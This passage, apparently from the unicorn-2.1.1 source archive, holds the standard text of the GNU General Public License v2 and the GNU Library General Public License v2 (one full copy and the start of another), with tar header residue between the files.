individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. , 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. unicorn-2.1.1/COPYING.LGPL2000066400000000000000000000614471467524106700150720ustar00rootroot00000000000000 GNU LIBRARY GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1991 Free Software Foundation, Inc. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. [This is the first released version of the library GPL. It is numbered 2 because it goes with version 2 of the ordinary GPL.] Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public Licenses are intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This license, the Library General Public License, applies to some specially designated Free Software Foundation software, and to any other libraries whose authors decide to use it. You can use it for your libraries, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the library, or if you modify it. For example, if you distribute copies of the library, whether gratis or for a fee, you must give the recipients all the rights that we gave you. You must make sure that they, too, receive or can get the source code. If you link a program with the library, you must provide complete object files to the recipients so that they can relink them with the library, after making changes to the library and recompiling it. And you must show them these terms so they know their rights. Our method of protecting your rights has two steps: (1) copyright the library, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the library. Also, for each distributor's protection, we want to make certain that everyone understands that there is no warranty for this free library. If the library is modified by someone else and passed on, we want its recipients to know that what they have is not the original version, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that companies distributing free software will individually obtain patent licenses, thus in effect transforming the program into proprietary software. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. Most GNU software, including some libraries, is covered by the ordinary GNU General Public License, which was designed for utility programs. This license, the GNU Library General Public License, applies to certain designated libraries. This license is quite different from the ordinary one; be sure to read it in full, and don't assume that anything in it is the same as in the ordinary license. The reason we have a separate public license for some libraries is that they blur the distinction we usually make between modifying or adding to a program and simply using it. Linking a program with a library, without changing the library, is in some sense simply using the library, and is analogous to running a utility program or application program. However, in a textual and legal sense, the linked executable is a combined work, a derivative of the original library, and the ordinary General Public License treats it as such. Because of this blurred distinction, using the ordinary General Public License for libraries did not effectively promote software sharing, because most developers did not use the libraries. We concluded that weaker conditions might promote sharing better. However, unrestricted linking of non-free programs would deprive the users of those programs of all benefit from the free status of the libraries themselves. This Library General Public License is intended to permit developers of non-free programs to use free libraries, while preserving your freedom as a user of such programs to change the free libraries that are incorporated in them. (We have not seen how to achieve this as regards changes in header files, but we have achieved it as regards changes in the actual functions of the Library.) The hope is that this will lead to faster development of free libraries. The precise terms and conditions for copying, distribution and modification follow. Pay close attention to the difference between a "work based on the library" and a "work that uses the library". The former contains code derived from the library, while the latter only works together with the library. Note that it is possible for a library to be covered by the ordinary General Public License rather than by this special one. GNU LIBRARY GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License Agreement applies to any software library which contains a notice placed by the copyright holder or other authorized party saying it may be distributed under the terms of this Library General Public License (also called "this License"). Each licensee is addressed as "you". A "library" means a collection of software functions and/or data prepared so as to be conveniently linked with application programs (which use some of those functions and data) to form executables. The "Library", below, refers to any such software library or work which has been distributed under these terms. A "work based on the Library" means either the Library or any derivative work under copyright law: that is to say, a work containing the Library or a portion of it, either verbatim or with modifications and/or translated straightforwardly into another language. (Hereinafter, translation is included without limitation in the term "modification".) "Source code" for a work means the preferred form of the work for making modifications to it. For a library, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the library. Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running a program using the Library is not restricted, and output from such a program is covered only if its contents constitute a work based on the Library (independent of the use of the Library in a tool for writing it). Whether that is true depends on what the Library does and what the program that uses the Library does. 1. You may copy and distribute verbatim copies of the Library's complete source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and distribute a copy of this License along with the Library. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Library or any portion of it, thus forming a work based on the Library, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) The modified work must itself be a software library. b) You must cause the files modified to carry prominent notices stating that you changed the files and the date of any change. c) You must cause the whole of the work to be licensed at no charge to all third parties under the terms of this License. d) If a facility in the modified Library refers to a function or a table of data to be supplied by an application program that uses the facility, other than as an argument passed when the facility is invoked, then you must make a good faith effort to ensure that, in the event an application does not supply such function or table, the facility still operates, and performs whatever part of its purpose remains meaningful. (For example, a function in a library to compute square roots has a purpose that is entirely well-defined independent of the application. Therefore, Subsection 2d requires that any application-supplied function or table used by this function must be optional: if the application does not supply it, the square root function must still compute square roots.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Library, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Library, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Library. In addition, mere aggregation of another work not based on the Library with the Library (or with a work based on the Library) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may opt to apply the terms of the ordinary GNU General Public License instead of this License to a given copy of the Library. To do this, you must alter all the notices that refer to this License, so that they refer to the ordinary GNU General Public License, version 2, instead of to this License. (If a newer version than version 2 of the ordinary GNU General Public License has appeared, then you can specify that version instead if you wish.) Do not make any other change in these notices. Once this change is made in a given copy, it is irreversible for that copy, so the ordinary GNU General Public License applies to all subsequent copies and derivative works made from that copy. This option is useful when you wish to copy part of the code of the Library into a program that is not a library. 4. You may copy and distribute the Library (or a portion or derivative of it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange. If distribution of object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place satisfies the requirement to distribute the source code, even though third parties are not compelled to copy the source along with the object code. 5. A program that contains no derivative of any portion of the Library, but is designed to work with the Library by being compiled or linked with it, is called a "work that uses the Library". Such a work, in isolation, is not a derivative work of the Library, and therefore falls outside the scope of this License. However, linking a "work that uses the Library" with the Library creates an executable that is a derivative of the Library (because it contains portions of the Library), rather than a "work that uses the library". The executable is therefore covered by this License. Section 6 states terms for distribution of such executables. When a "work that uses the Library" uses material from a header file that is part of the Library, the object code for the work may be a derivative work of the Library even though the source code is not. Whether this is true is especially significant if the work can be linked without the Library, or if the work is itself a library. The threshold for this to be true is not precisely defined by law. If such an object file uses only numerical parameters, data structure layouts and accessors, and small macros and small inline functions (ten lines or less in length), then the use of the object file is unrestricted, regardless of whether it is legally a derivative work. (Executables containing this object code plus portions of the Library will still fall under Section 6.) Otherwise, if the work is a derivative of the Library, you may distribute the object code for the work under the terms of Section 6. Any executables containing that work also fall under Section 6, whether or not they are linked directly with the Library itself. 6. As an exception to the Sections above, you may also compile or link a "work that uses the Library" with the Library to produce a work containing portions of the Library, and distribute that work under terms of your choice, provided that the terms permit modification of the work for the customer's own use and reverse engineering for debugging such modifications. You must give prominent notice with each copy of the work that the Library is used in it and that the Library and its use are covered by this License. You must supply a copy of this License. If the work during execution displays copyright notices, you must include the copyright notice for the Library among them, as well as a reference directing the user to the copy of this License. Also, you must do one of these things: a) Accompany the work with the complete corresponding machine-readable source code for the Library including whatever changes were used in the work (which must be distributed under Sections 1 and 2 above); and, if the work is an executable linked with the Library, with the complete machine-readable "work that uses the Library", as object code and/or source code, so that the user can modify the Library and then relink to produce a modified executable containing the modified Library. (It is understood that the user who changes the contents of definitions files in the Library will not necessarily be able to recompile the application to use the modified definitions.) b) Accompany the work with a written offer, valid for at least three years, to give the same user the materials specified in Subsection 6a, above, for a charge no more than the cost of performing this distribution. c) If distribution of the work is made by offering access to copy from a designated place, offer equivalent access to copy the above specified materials from the same place. d) Verify that the user has already received a copy of these materials or that you have already sent this user a copy. For an executable, the required form of the "work that uses the Library" must include any data and utility programs needed for reproducing the executable from it. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. It may happen that this requirement contradicts the license restrictions of other proprietary libraries that do not normally accompany the operating system. Such a contradiction means you cannot use both them and the Library together in an executable that you distribute. 7. You may place library facilities that are a work based on the Library side-by-side in a single library together with other library facilities not covered by this License, and distribute such a combined library, provided that the separate distribution of the work based on the Library and of the other library facilities is otherwise permitted, and provided that you do these two things: a) Accompany the combined library with a copy of the same work based on the Library, uncombined with any other library facilities. This must be distributed under the terms of the Sections above. b) Give prominent notice with the combined library of the fact that part of it is a work based on the Library, and explaining where to find the accompanying uncombined form of the same work. 8. You may not copy, modify, sublicense, link with, or distribute the Library except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense, link with, or distribute the Library is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 9. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Library or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Library (or any work based on the Library), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Library or works based on it. 10. Each time you redistribute the Library (or any work based on the Library), the recipient automatically receives a license from the original licensor to copy, distribute, link with or modify the Library subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 11. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Library at all. For example, if a patent license would not permit royalty-free redistribution of the Library by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Library. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply, and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 12. If the distribution and/or use of the Library is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Library under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 13. The Free Software Foundation may publish revised and/or new versions of the Library General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Library specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Library does not specify a license version number, you may choose any version ever published by the Free Software Foundation. 14. If you wish to incorporate parts of the Library into other free programs whose distribution conditions are incompatible with these, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Libraries If you develop a new library, and you want it to be of the greatest possible use to the public, we recommend making it free software that everyone can redistribute and change. You can do so by permitting redistribution under these terms (or, alternatively, under the terms of the ordinary General Public License). To apply these terms, attach the following notices to the library. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This library is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Also add information on how to contact you by electronic and paper mail. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the library, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the library `Frob' (a library for tweaking knobs) written by James Random Hacker. , 1 April 1990 Ty Coon, President of Vice That's all there is to it! unicorn-2.1.1/COPYING_GLIB000066400000000000000000000613141467524106700150410ustar00rootroot00000000000000 GNU LIBRARY GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1991 Free Software Foundation, Inc. 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. [This is the first released version of the library GPL. It is numbered 2 because it goes with version 2 of the ordinary GPL.] Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public Licenses are intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This license, the Library General Public License, applies to some specially designated Free Software Foundation software, and to any other libraries whose authors decide to use it. You can use it for your libraries, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the library, or if you modify it. For example, if you distribute copies of the library, whether gratis or for a fee, you must give the recipients all the rights that we gave you. You must make sure that they, too, receive or can get the source code. If you link a program with the library, you must provide complete object files to the recipients so that they can relink them with the library, after making changes to the library and recompiling it. And you must show them these terms so they know their rights. Our method of protecting your rights has two steps: (1) copyright the library, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the library. Also, for each distributor's protection, we want to make certain that everyone understands that there is no warranty for this free library. If the library is modified by someone else and passed on, we want its recipients to know that what they have is not the original version, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that companies distributing free software will individually obtain patent licenses, thus in effect transforming the program into proprietary software. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. Most GNU software, including some libraries, is covered by the ordinary GNU General Public License, which was designed for utility programs. This license, the GNU Library General Public License, applies to certain designated libraries. This license is quite different from the ordinary one; be sure to read it in full, and don't assume that anything in it is the same as in the ordinary license. The reason we have a separate public license for some libraries is that they blur the distinction we usually make between modifying or adding to a program and simply using it. Linking a program with a library, without changing the library, is in some sense simply using the library, and is analogous to running a utility program or application program. However, in a textual and legal sense, the linked executable is a combined work, a derivative of the original library, and the ordinary General Public License treats it as such. Because of this blurred distinction, using the ordinary General Public License for libraries did not effectively promote software sharing, because most developers did not use the libraries. We concluded that weaker conditions might promote sharing better. However, unrestricted linking of non-free programs would deprive the users of those programs of all benefit from the free status of the libraries themselves. This Library General Public License is intended to permit developers of non-free programs to use free libraries, while preserving your freedom as a user of such programs to change the free libraries that are incorporated in them. (We have not seen how to achieve this as regards changes in header files, but we have achieved it as regards changes in the actual functions of the Library.) The hope is that this will lead to faster development of free libraries. The precise terms and conditions for copying, distribution and modification follow. Pay close attention to the difference between a "work based on the library" and a "work that uses the library". The former contains code derived from the library, while the latter only works together with the library. Note that it is possible for a library to be covered by the ordinary General Public License rather than by this special one. GNU LIBRARY GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License Agreement applies to any software library which contains a notice placed by the copyright holder or other authorized party saying it may be distributed under the terms of this Library General Public License (also called "this License"). Each licensee is addressed as "you". A "library" means a collection of software functions and/or data prepared so as to be conveniently linked with application programs (which use some of those functions and data) to form executables. The "Library", below, refers to any such software library or work which has been distributed under these terms. A "work based on the Library" means either the Library or any derivative work under copyright law: that is to say, a work containing the Library or a portion of it, either verbatim or with modifications and/or translated straightforwardly into another language. (Hereinafter, translation is included without limitation in the term "modification".) "Source code" for a work means the preferred form of the work for making modifications to it. For a library, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the library. Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running a program using the Library is not restricted, and output from such a program is covered only if its contents constitute a work based on the Library (independent of the use of the Library in a tool for writing it). Whether that is true depends on what the Library does and what the program that uses the Library does. 1. You may copy and distribute verbatim copies of the Library's complete source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and distribute a copy of this License along with the Library. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Library or any portion of it, thus forming a work based on the Library, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) The modified work must itself be a software library. b) You must cause the files modified to carry prominent notices stating that you changed the files and the date of any change. c) You must cause the whole of the work to be licensed at no charge to all third parties under the terms of this License. d) If a facility in the modified Library refers to a function or a table of data to be supplied by an application program that uses the facility, other than as an argument passed when the facility is invoked, then you must make a good faith effort to ensure that, in the event an application does not supply such function or table, the facility still operates, and performs whatever part of its purpose remains meaningful. (For example, a function in a library to compute square roots has a purpose that is entirely well-defined independent of the application. Therefore, Subsection 2d requires that any application-supplied function or table used by this function must be optional: if the application does not supply it, the square root function must still compute square roots.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Library, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Library, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Library. In addition, mere aggregation of another work not based on the Library with the Library (or with a work based on the Library) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may opt to apply the terms of the ordinary GNU General Public License instead of this License to a given copy of the Library. To do this, you must alter all the notices that refer to this License, so that they refer to the ordinary GNU General Public License, version 2, instead of to this License. (If a newer version than version 2 of the ordinary GNU General Public License has appeared, then you can specify that version instead if you wish.) Do not make any other change in these notices. Once this change is made in a given copy, it is irreversible for that copy, so the ordinary GNU General Public License applies to 